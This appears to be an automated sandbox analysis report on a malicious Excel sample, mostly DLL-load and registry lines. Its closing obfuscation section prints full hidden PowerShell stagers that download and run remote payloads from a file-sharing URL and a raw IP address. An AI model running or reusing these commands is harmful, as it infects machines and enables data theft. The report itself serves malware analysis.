                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
                  Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: nlaapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: rpcrtremote.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: pstorec.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: atl.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                  Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                  Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.pdbhP source: powershell.exe, 00000012.00000002.486539543.000000000284C000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.pdb source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ovqlooon\ovqlooon.pdb source: powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\b53lag2c\b53lag2c.pdbhP source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp
                  Source: OC25-11-24.xls Initial sample: OLE indicators encrypted = True

                  Data Obfuscation

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('nErimageUrl = ZM5https://3105.filemail.com/api/file/get?fil'+'ekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-'+'dviTK5cARaNdQ'+'jbb3mexfwQzKmTXg'+'&skipreg=true&pk_vid'+'=e0109638c9bfb9571732531309b5ff7c Z'+'M5;nErwe'+'bClient = New-Object System.Net.WebC'+'lient;nErimageBytes = nErwebClient.DownloadData('+'nErimageUrl);nErimageText = ['+'System.Text.Encoding]::UTF8.GetStr'+'ing(nErimageBy'+'tes);nErstartFlag ='+' ZM5<<BASE64_START>>ZM5'+';nErendFlag = ZM5<<BASE64_'+'END>>ZM5;nErstartIndex = nErimageTex'+'t.IndexOf(nErstartFlag);nErendInd'+'ex = nErimageText.IndexOf('+'nErendFlag);nE'+'rstartIn'+'dex -ge 0 -and nErendIndex -gt nErstartIndex;nErstartIndex += nErstartFlag.Length;nErbase64'+'L'+'ength = nErendInde'+'x - nErsta'+'rtIndex;nErbase64Command = nErimageText.Substring(nErstartIndex, nErbase64Length'+');nErbase64Reversed = -join (nErba'+'se64Command.ToCharArray() JI6 ForEach'+'-Object { nEr_ })[-1..-(nErbase64Command.Length)];nErcommandBytes = [System.Convert]::'+'FromBas'+'e64String(nErbase64Reversed);nErloadedAssembly = [System.Reflection.Assembly]::Load(nErcommandBytes);nErvaiMethod = [dnlib.IO.Home].GetMethod'+'(ZM5VAIZM5);nErvaiMethod.Invoke(nErnull, @(ZM5txt.RSRVRS/'+'4421/531.5'+'02.432.271//:ptthZM5, ZM5'+'desativadoZM5, ZM5desativadoZM5, ZM5desativadoZM'+'5, ZM5CasPolZM5, ZM5desativadoZM5, ZM5desativadoZM5,ZM5desativadoZM5,Z'+'M5desativadoZ'+'M5,ZM5desativado'+'ZM'+'5,ZM5desativadoZM5,ZM5desativad'+'oZM5'+',ZM51ZM5,ZM5desativadoZM5));') -RePlacE ([char]110+[char]69+[char]114),[char]36-CReplAcE 'ZM5',[char]39 -RePlacE([char]74+[char]73+[char]54),[char]124)|& ( $pSHOME[4]+$PShOME[30]+'x')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTeM32\WinDowSPOWeRSHelL\V1.0\PoWersHell.Exe" "pOWerSHeLL.EXe -Ex BypasS -noP -W 1 -c dEVICecREDEntIAlDEplOymENT.exE ; iEx($(Iex('[sYsTEm.TEXt.ENCodinG]'+[ChAr]0X3A+[Char]0x3A+'uTf8.GetSTRiNg([SYSTeM.ConveRt]'+[CHAr]0x3a+[ChAR]0X3A+'FROMBASE64StRING('+[cHaR]0x22+'JHZiS3kyVzJoWiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJEZUZJbml0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1hS29BY2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNNTlFvZnJsUUUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhadFZYTk9QLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVExxUHptVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHRMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ1QUl0R1YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2lsZGJGTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR2Ykt5MlcyaFo6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjM0LjIwNS4xMzUvMTI0NC9jcmVhdGdvb2RpZGVhZm9yZnV0dXJlYnVzaW5lc3NkZXZlbG9wd2l0aG5pY2V0aGluZ3NnZXRiYWNrb24udElGIiwiJEVOVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIiwwLDApO3N0QVJULVNsRWVwKDMpO0lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGNyZWF0Z29vZGlkZWFmb3JmdXR1cmVidXNpbmVzc2RldmVsb3B3aXRobmljZXRoaW4udkJzIg=='+[ChAR]0x22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
